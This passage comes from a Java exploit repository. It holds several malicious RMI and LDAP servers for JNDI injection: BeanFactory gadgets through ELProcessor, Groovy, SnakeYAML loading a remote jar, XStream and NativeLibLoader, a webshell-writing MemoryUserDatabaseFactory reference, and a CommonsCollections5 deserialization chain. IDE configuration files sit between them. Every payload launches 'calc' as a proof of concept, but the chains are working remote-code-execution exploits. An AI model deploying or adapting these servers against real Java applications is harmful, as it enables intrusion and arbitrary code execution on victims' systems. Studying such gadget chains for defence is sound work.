15 |         ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
16 |         String yaml = "!!javax.script.ScriptEngineManager [\n" +
17 |                 "  !!java.net.URLClassLoader [[\n" +
18 |                 "    !!java.net.URL [\"http://127.0.0.1:8888/yaml-payload.jar\"]\n" +
19 |                 "  ]]\n" +
20 |                 "]";
21 |         ref.add(new StringRefAddr("forceString", "a=load"));
22 |         ref.add(new StringRefAddr("a", yaml));
23 | 
24 |         ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
25 |         registry.bind("yaml", referenceWrapper);  // 绑定目录名
26 |         System.out.println("Server Start on 1100...");
27 |     }
28 | }


--------------------------------------------------------------------------------
/groovy.lang.GroovyClassLoader.parseClass/src/main/java/org/example/GroovyShellServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class GroovyShellServer {
11 |     public static void main(String[] args) throws Exception {
12 |         System.out.println("Creating evil RMI registry on port 1100");
13 |         Registry registry = LocateRegistry.createRegistry(1100);
14 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
15 |         ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
16 |         ref.add(new StringRefAddr("forceString", "x=parseClass"));
17 |         String script = "@groovy.transform.ASTTest(value={\n" +
18 |                 "    assert java.lang.Runtime.getRuntime().exec(\"calc\")\n" +
19 |                 "})\n" +
20 |                 "def x\n";
21 |         ref.add(new StringRefAddr("x",script));
22 | 
23 |         ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
24 |         registry.bind("evilGroovy", referenceWrapper);
25 |     }
26 | }
27 | 


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 4 |   <component name="MavenProjectsManager">
 5 |     <option name="originalFiles">
 6 |       <list>
 7 |         <option value="$PROJECT_DIR$/com.sun.glass.utils.NativeLibLoader/pom.xml" />
 8 |         <option value="$PROJECT_DIR$/javax.management.loading.MLet/pom.xml" />
 9 |         <option value="$PROJECT_DIR$/org.apache.naming.factory.BeanFactory/pom.xml" />
10 |         <option value="$PROJECT_DIR$/groovy.lang.GroovyClassLoader.parseClass/pom.xml" />
11 |         <option value="$PROJECT_DIR$/com.sun.glass.utils.NativeLibLoader/org.mvel2.sh.ShellSession.exec/pom.xml" />
12 |         <option value="$PROJECT_DIR$/org.mvel2.sh.ShellSession.exec/pom.xml" />
13 |         <option value="$PROJECT_DIR$/org.yaml.snakeyaml.Yaml/pom.xml" />
14 |         <option value="$PROJECT_DIR$/com.thoughtworks.xstream.XStream.fromXML/pom.xml" />
15 |         <option value="$PROJECT_DIR$/ByUnserialize/pom.xml" />
16 |         <option value="$PROJECT_DIR$/org.apache.catalina.users.MemoryUserDatabaseFactory/pom.xml" />
17 |       </list>
18 |     </option>
19 |   </component>
20 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" project-jdk-name="1.8" project-jdk-type="JavaSDK">
21 |     <output url="file://$PROJECT_DIR$/out" />
22 |   </component>
23 | </project>


--------------------------------------------------------------------------------
/org.apache.naming.factory.BeanFactory/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>org.apache.naming.factory.BeanFactory</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-dbcp</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |         <dependency>
23 |             <groupId>org.apache.tomcat</groupId>
24 |             <artifactId>tomcat-catalina</artifactId>
25 |             <version>9.0.8</version>
26 |         </dependency>
27 |         <dependency>
28 |             <groupId>org.apache.tomcat</groupId>
29 |             <artifactId>tomcat-jasper</artifactId>
30 |             <version>9.0.8</version>
31 |         </dependency>
32 |     </dependencies>
33 | 
34 | </project>


--------------------------------------------------------------------------------
/org.apache.naming.factory.BeanFactory/src/main/java/org/example/TomcatBeanFactoryServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class TomcatBeanFactoryServer {
11 |     public static void main(String[] args) throws Exception {
12 |         Registry registry = LocateRegistry.createRegistry(1100);
13 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
14 |         // 实例化Reference，指定目标类为javax.el.ELProcessor，工厂类为org.apache.naming.factory.BeanFactory
15 |         ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
16 | 
17 |         // 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
18 |         ref.add(new StringRefAddr("forceString", "bitterz=eval"));
19 | 
20 |         // 指定bitterz属性指定其setter方法需要的参数，实际是ElProcessor.eval方法执行的参数，利用表达式执行命令
21 |         ref.add(new StringRefAddr("bitterz", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));
22 | 
23 |         ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
24 |         registry.bind("Exploit", referenceWrapper);  // 绑定目录名
25 |         System.out.println("Server Start on 1100...");
26 |     }
27 | }


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/src/main/java/org/example/NativeLibLoaderServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.NamingException;
 7 | import javax.naming.StringRefAddr;
 8 | import java.rmi.AlreadyBoundException;
 9 | import java.rmi.RemoteException;
10 | import java.rmi.registry.LocateRegistry;
11 | import java.rmi.registry.Registry;
12 | /*
13 |  com.sun.glass.utils.NativeLibLoader,JDK内置的动态链接库加载工具类
14 |  可以被JNDI注入利用加载恶意dll来执行任意代码
15 |  需要的条件:
16 |     1.存在JNDI注入
17 |     2.被攻击服务器存在可以被利用的.dll或者.so文件在攻击者可控制的路径下
18 | 
19 |  */
20 | 
21 | public class NativeLibLoaderServer {
22 |     public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
23 |         Registry registry = LocateRegistry.createRegistry(1100);
24 |         //攻击主机的公网ip
25 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
26 |         ResourceRef ref = new ResourceRef("com.sun.glass.utils.NativeLibLoader", null, "", "",
27 |                 true, "org.apache.naming.factory.BeanFactory", null);
28 |         ref.add(new StringRefAddr("forceString", "a=loadLibrary"));
29 |         //不能使用绝对路径,相对路径根据不同的环境修改
30 |         ref.add(new StringRefAddr("a", "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\libcmd"));
31 | 
32 |         ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
33 |         registry.bind("dllLoader", referenceWrapper);
34 |         System.out.println("RMI Server start on 1100");
35 |     }
36 | }
37 | 


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="Encoding">
 4 |     <file url="file://$PROJECT_DIR$/ByUnserialize/src/main/java" charset="UTF-8" />
 5 |     <file url="file://$PROJECT_DIR$/ByUnserialize/src/main/resources" charset="UTF-8" />
 6 |     <file url="file://$PROJECT_DIR$/com.thoughtworks.xstream.XStream.fromXML/src/main/java" charset="UTF-8" />
 7 |     <file url="file://$PROJECT_DIR$/com.thoughtworks.xstream.XStream.fromXML/src/main/resources" charset="UTF-8" />
 8 |     <file url="file://$PROJECT_DIR$/groovy.lang.GroovyClassLoader.parseClass/src/main/java" charset="UTF-8" />
 9 |     <file url="file://$PROJECT_DIR$/groovy.lang.GroovyClassLoader.parseClass/src/main/resources" charset="UTF-8" />
10 |     <file url="file://$PROJECT_DIR$/javax.management.loading.MLet/src/main/java" charset="UTF-8" />
11 |     <file url="file://$PROJECT_DIR$/javax.management.loading.MLet/src/main/resources" charset="UTF-8" />
12 |     <file url="file://$PROJECT_DIR$/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java" charset="UTF-8" />
13 |     <file url="file://$PROJECT_DIR$/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/resources" charset="UTF-8" />
14 |     <file url="file://$PROJECT_DIR$/org.apache.naming.factory.BeanFactory/src/main/java" charset="UTF-8" />
15 |     <file url="file://$PROJECT_DIR$/org.apache.naming.factory.BeanFactory/src/main/resources" charset="UTF-8" />
16 |     <file url="file://$PROJECT_DIR$/org.mvel2.sh.ShellSession.exec/src/main/java" charset="UTF-8" />
17 |     <file url="file://$PROJECT_DIR$/org.mvel2.sh.ShellSession.exec/src/main/resources" charset="UTF-8" />
18 |     <file url="file://$PROJECT_DIR$/org.yaml.snakeyaml.Yaml/src/main/java" charset="UTF-8" />
19 |     <file url="file://$PROJECT_DIR$/org.yaml.snakeyaml.Yaml/src/main/resources" charset="UTF-8" />
20 |   </component>
21 | </project>


--------------------------------------------------------------------------------
/com.thoughtworks.xstream.XStream.fromXML/src/main/java/org/example/XstreamServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.NamingException;
 7 | import javax.naming.StringRefAddr;
 8 | import java.rmi.AlreadyBoundException;
 9 | import java.rmi.RemoteException;
10 | import java.rmi.registry.LocateRegistry;
11 | import java.rmi.registry.Registry;
12 | 
13 | public class XstreamServer {
14 |     public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException, AlreadyBoundException {
15 |         Registry registry = LocateRegistry.createRegistry(1100);
16 |         //攻击主机的公网ip
17 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
18 | 
19 |         ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "",
20 |                 true, "org.apache.naming.factory.BeanFactory", null);
21 |         String xml = "<sorted-set>\n"+
22 |                 "<dynamic-proxy>\n"+
23 |                 "<interface>java.lang.Comparable</interface>\n"+
24 |                 "<handler class='java.beans.EventHandler'>\n"+
25 |                 "<target class='java.lang.ProcessBuilder'>\n"+
26 |                 "<command>\n"+
27 |                 "<string>calc</string>\n"+
28 |                 "</command>\n"+
29 |                 "</target>\n"+
30 |                 "<action>start</action>\n"+
31 |                 "</handler>\n"+
32 |                 "</dynamic-proxy>\n"+
33 |                 "</sorted-set>\n";
34 |         ref.add(new StringRefAddr("forceString", "a=fromXML"));
35 |         ref.add(new StringRefAddr("a", xml));
36 | 
37 |         ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
38 |         registry.bind("FromXML", referenceWrapper);
39 |         System.out.println("RMI Server start on 1100");
40 |     }
41 | }
42 | 


--------------------------------------------------------------------------------
/org.yaml.snakeyaml.Yaml/src/main/java/org/example/File.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import javax.script.ScriptEngine;
 4 | import javax.script.ScriptEngineFactory;
 5 | import java.io.IOException;
 6 | import java.util.List;
 7 | 
 8 | public class File implements ScriptEngineFactory {
 9 | 
10 |     public File() {
11 |         try {
12 |             new java.io.IOException().printStackTrace();
13 |             java.lang.Runtime.getRuntime().exec("calc");
14 |         } catch (IOException e) {
15 |             e.printStackTrace();
16 |         }
17 |     }
18 |     public static void main(String[] args) throws IOException {
19 |         new java.io.IOException().printStackTrace();
20 |         java.lang.Runtime.getRuntime().exec("calc");
21 |     }
22 | 
23 |     @Override
24 |     public String getEngineName() {
25 |         return null;
26 |     }
27 | 
28 |     @Override
29 |     public String getEngineVersion() {
30 |         return null;
31 |     }
32 | 
33 |     @Override
34 |     public List<String> getExtensions() {
35 |         return null;
36 |     }
37 | 
38 |     @Override
39 |     public List<String> getMimeTypes() {
40 |         return null;
41 |     }
42 | 
43 |     @Override
44 |     public List<String> getNames() {
45 |         return null;
46 |     }
47 | 
48 |     @Override
49 |     public String getLanguageName() {
50 |         return null;
51 |     }
52 | 
53 |     @Override
54 |     public String getLanguageVersion() {
55 |         return null;
56 |     }
57 | 
58 |     @Override
59 |     public Object getParameter(String key) {
60 |         return null;
61 |     }
62 | 
63 |     @Override
64 |     public String getMethodCallSyntax(String obj, String m, String... args) {
65 |         return null;
66 |     }
67 | 
68 |     @Override
69 |     public String getOutputStatement(String toDisplay) {
70 |         return null;
71 |     }
72 | 
73 |     @Override
74 |     public String getProgram(String... statements) {
75 |         return null;
76 |     }
77 | 
78 |     @Override
79 |     public ScriptEngine getScriptEngine() {
80 |         return null;
81 |     }
82 | }


--------------------------------------------------------------------------------
/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/UserDataRCE_Server_linux.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class UserDataRCE_Server_linux {
11 |     public static void main(String[] args) throws Exception{
12 |         System.out.println("Creating evil RMI registry on port 1100");
13 |         Registry registry = LocateRegistry.createRegistry(1100);
14 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
15 | 
16 |         // ===============================1 创建http:/==================================
17 |         // ResourceRef ref = new ResourceRef("org.h2.store.fs.FileUtils", null, "", "",
18 |         //         true, "org.apache.naming.factory.BeanFactory", null);
19 |         // ref.add(new StringRefAddr("forceString", "a=createDirectory"));
20 |         // ref.add(new StringRefAddr("a", "../http:"));
21 | 
22 |         // ===============================2 创建http:/127.0.0.1:7777.1:8888/============
23 |         // ResourceRef ref = new ResourceRef("org.h2.store.fs.FileUtils", null, "", "",
24 |         //         true, "org.apache.naming.factory.BeanFactory", null);
25 |         // ref.add(new StringRefAddr("forceString", "a=createDirectory"));
26 |         // ref.add(new StringRefAddr("a", "../http:/127.0.0.1:8888"));
27 | 
28 |         // ===============================3 写入webshell文件=============================
29 |         ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "",
30 |                 true, "org.apache.catalina.users.MemoryUserDatabaseFactory", null);
31 |         ref.add(new StringRefAddr("pathname", "http://127.0.0.1:7777/../../webapps/ROOT/webshell.jsp"));
32 |         ref.add(new StringRefAddr("readonly", "false"));
33 | 
34 |         ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
35 |         registry.bind("writeFile", referenceWrapper);
36 |     }
37 | }
38 | 


--------------------------------------------------------------------------------
/.idea/artifacts/org_yaml_snakeyaml_Yaml_jar.xml:
--------------------------------------------------------------------------------
 1 | <component name="ArtifactManager">
 2 |   <artifact type="jar" name="org.yaml.snakeyaml.Yaml:jar">
 3 |     <output-path>$PROJECT_DIR$/out/artifacts/org_yaml_snakeyaml_Yaml_jar</output-path>
 4 |     <root id="archive" name="org.yaml.snakeyaml.Yaml.jar">
 5 |       <element id="directory" name="META-INF">
 6 |         <element id="file-copy" path="$PROJECT_DIR$/com.sun.glass.utils.NativeLibLoader/src/main/resources/META-INF/MANIFEST.MF" />
 7 |       </element>
 8 |       <element id="module-output" name="org.yaml.snakeyaml.Yaml" />
 9 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-juli/9.0.8/tomcat-juli-9.0.8.jar" path-in-jar="/" />
10 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jsp-api/9.0.8/tomcat-jsp-api-9.0.8.jar" path-in-jar="/" />
11 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-util-scan/9.0.8/tomcat-util-scan-9.0.8.jar" path-in-jar="/" />
12 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jaspic-api/9.0.8/tomcat-jaspic-api-9.0.8.jar" path-in-jar="/" />
13 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-annotations-api/9.0.8/tomcat-annotations-api-9.0.8.jar" path-in-jar="/" />
14 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-coyote/9.0.8/tomcat-coyote-9.0.8.jar" path-in-jar="/" />
15 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-el-api/9.0.8/tomcat-el-api-9.0.8.jar" path-in-jar="/" />
16 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/yaml/snakeyaml/1.33/snakeyaml-1.33.jar" path-in-jar="/" />
17 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-servlet-api/9.0.8/tomcat-servlet-api-9.0.8.jar" path-in-jar="/" />
18 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-util/9.0.8/tomcat-util-9.0.8.jar" path-in-jar="/" />
19 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-api/9.0.8/tomcat-api-9.0.8.jar" path-in-jar="/" />
20 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-catalina/9.0.8/tomcat-catalina-9.0.8.jar" path-in-jar="/" />
21 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jni/9.0.8/tomcat-jni-9.0.8.jar" path-in-jar="/" />
22 |     </root>
23 |   </artifact>
24 | </component>


--------------------------------------------------------------------------------
/.idea/artifacts/org_apache_naming_factory_BeanFactory_jar.xml:
--------------------------------------------------------------------------------
 1 | <component name="ArtifactManager">
 2 |   <artifact type="jar" name="org.apache.naming.factory.BeanFactory:jar">
 3 |     <output-path>$PROJECT_DIR$/out/artifacts/org_apache_naming_factory_BeanFactory_jar</output-path>
 4 |     <root id="archive" name="org.apache.naming.factory.BeanFactory.jar">
 5 |       <element id="directory" name="META-INF">
 6 |         <element id="file-copy" path="$PROJECT_DIR$/com.sun.glass.utils.NativeLibLoader/src/main/resources/META-INF/MANIFEST.MF" />
 7 |       </element>
 8 |       <element id="module-output" name="org.apache.naming.factory.BeanFactory" />
 9 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jaspic-api/9.0.8/tomcat-jaspic-api-9.0.8.jar" path-in-jar="/" />
10 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jni/9.0.8/tomcat-jni-9.0.8.jar" path-in-jar="/" />
11 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-servlet-api/9.0.8/tomcat-servlet-api-9.0.8.jar" path-in-jar="/" />
12 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-annotations-api/9.0.8/tomcat-annotations-api-9.0.8.jar" path-in-jar="/" />
13 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-coyote/9.0.8/tomcat-coyote-9.0.8.jar" path-in-jar="/" />
14 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-util/9.0.8/tomcat-util-9.0.8.jar" path-in-jar="/" />
15 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-juli/9.0.8/tomcat-juli-9.0.8.jar" path-in-jar="/" />
16 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-dbcp/9.0.8/tomcat-dbcp-9.0.8.jar" path-in-jar="/" />
17 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jasper-el/9.0.8/tomcat-jasper-el-9.0.8.jar" path-in-jar="/" />
18 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-api/9.0.8/tomcat-api-9.0.8.jar" path-in-jar="/" />
19 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-catalina/9.0.8/tomcat-catalina-9.0.8.jar" path-in-jar="/" />
20 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-util-scan/9.0.8/tomcat-util-scan-9.0.8.jar" path-in-jar="/" />
21 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/eclipse/jdt/ecj/3.13.102/ecj-3.13.102.jar" path-in-jar="/" />
22 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jsp-api/9.0.8/tomcat-jsp-api-9.0.8.jar" path-in-jar="/" />
23 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-jasper/9.0.8/tomcat-jasper-9.0.8.jar" path-in-jar="/" />
24 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/org/apache/tomcat/tomcat-el-api/9.0.8/tomcat-el-api-9.0.8.jar" path-in-jar="/" />
25 |     </root>
26 |   </artifact>
27 | </component>


--------------------------------------------------------------------------------
/ByUnserialize/src/main/java/org/example/UnserializeLDAPServer.java:
--------------------------------------------------------------------------------
  1 | package org.example;
  2 | 
  3 | import com.unboundid.ldap.listener.InMemoryDirectoryServer;
  4 | import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
  5 | import com.unboundid.ldap.listener.InMemoryListenerConfig;
  6 | import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
  7 | import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
  8 | import com.unboundid.ldap.sdk.Entry;
  9 | import com.unboundid.ldap.sdk.LDAPResult;
 10 | import com.unboundid.ldap.sdk.ResultCode;
 11 | import org.apache.commons.collections.Transformer;
 12 | import org.apache.commons.collections.functors.ChainedTransformer;
 13 | import org.apache.commons.collections.functors.ConstantTransformer;
 14 | import org.apache.commons.collections.functors.InvokerTransformer;
 15 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
 16 | import org.apache.commons.collections.map.LazyMap;
 17 | 
 18 | import javax.management.BadAttributeValueExpException;
 19 | import javax.net.ServerSocketFactory;
 20 | import javax.net.SocketFactory;
 21 | import javax.net.ssl.SSLSocketFactory;
 22 | import java.io.ByteArrayOutputStream;
 23 | import java.io.ObjectOutputStream;
 24 | import java.lang.reflect.Field;
 25 | import java.net.InetAddress;
 26 | import java.net.URL;
 27 | import java.util.HashMap;
 28 | import java.util.Map;
 29 | 
 30 | 
 31 | public class UnserializeLDAPServer {
 32 |     private static final String LDAP_BASE = "dc=example,dc=com";
 33 | 
 34 |     public static void main ( String[] tmp_args ) throws Exception{
 35 |         String[] args=new String[]{"http://127.0.0.1:8081/#CC5"};
 36 |         int port = 4444;
 37 | 
 38 |         InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
 39 |         config.setListenerConfigs(new InMemoryListenerConfig(
 40 |                 "listen", //$NON-NLS-1$
 41 |                 InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
 42 |                 port,
 43 |                 ServerSocketFactory.getDefault(),
 44 |                 SocketFactory.getDefault(),
 45 |                 (SSLSocketFactory) SSLSocketFactory.getDefault()));
 46 | 
 47 |         config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
 48 |         InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
 49 |         System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
 50 |         ds.startListening();
 51 |     }
 52 | 
 53 |     private static class OperationInterceptor extends InMemoryOperationInterceptor {
 54 | 
 55 |         private URL codebase;
 56 | 
 57 |         public OperationInterceptor ( URL cb ) {
 58 |             this.codebase = cb;
 59 |         }
 60 | 
 61 |         @Override
 62 |         public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
 63 |             String base = result.getRequest().getBaseDN();
 64 |             Entry e = new Entry(base);
 65 |             try {
 66 |                 sendResult(result, base, e);
 67 |             }
 68 |             catch ( Exception e1 ) {
 69 |                 e1.printStackTrace();
 70 |             }
 71 |         }
 72 | 
 73 |         protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
 74 |             URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
 75 |             System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
 76 |             e.addAttribute("javaClassName", "foo");
 77 |             String cbstring = this.codebase.toString();
 78 |             int refPos = cbstring.indexOf('#');
 79 |             if ( refPos > 0 ) {
 80 |                 cbstring = cbstring.substring(0, refPos);
 81 |             }
 82 | 
 83 |             //CommonsCollections5()可以换成 Base64.decode("cc5链条序列化加base64的内容")java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'calc'|base64
 84 |             e.addAttribute("javaSerializedData",CommonsCollections5());
 85 | 
 86 |             result.sendSearchEntry(e);
 87 |             result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
 88 |         }
 89 |     }
 90 | 
 91 |     private static byte[] CommonsCollections5() throws Exception{
 92 |         Transformer[] transformers=new Transformer[]{
 93 |                 new ConstantTransformer(Runtime.class),
 94 |                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
 95 |                 new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
 96 |                 new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
 97 |         };
 98 | 
 99 |         ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
100 |         Map map=new HashMap();
101 |         Map lazyMap= LazyMap.decorate(map,chainedTransformer);
102 |         TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test");
103 |         BadAttributeValueExpException badAttributeValueExpException=new BadAttributeValueExpException(null);
104 |         Field field=badAttributeValueExpException.getClass().getDeclaredField("val");
105 |         field.setAccessible(true);
106 |         field.set(badAttributeValueExpException,tiedMapEntry);
107 | 
108 |         ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
109 | 
110 |         ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
111 |         objectOutputStream.writeObject(badAttributeValueExpException);
112 |         objectOutputStream.close();
113 | 
114 |         return byteArrayOutputStream.toByteArray();
115 |     }
116 | }


--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <project version="4">
  3 |   <component name="Palette2">
  4 |     <group name="Swing">
  5 |       <item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
  6 |         <default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
  7 |       </item>
  8 |       <item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.svg" removable="false" auto-create-binding="false" can-attach-label="false">
  9 |         <default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
 10 |       </item>
 11 |       <item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 12 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
 13 |       </item>
 14 |       <item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.svg" removable="false" auto-create-binding="false" can-attach-label="true">
 15 |         <default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
 16 |       </item>
 17 |       <item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 18 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
 19 |         <initial-values>
 20 |           <property name="text" value="Button" />
 21 |         </initial-values>
 22 |       </item>
 23 |       <item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 24 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 25 |         <initial-values>
 26 |           <property name="text" value="RadioButton" />
 27 |         </initial-values>
 28 |       </item>
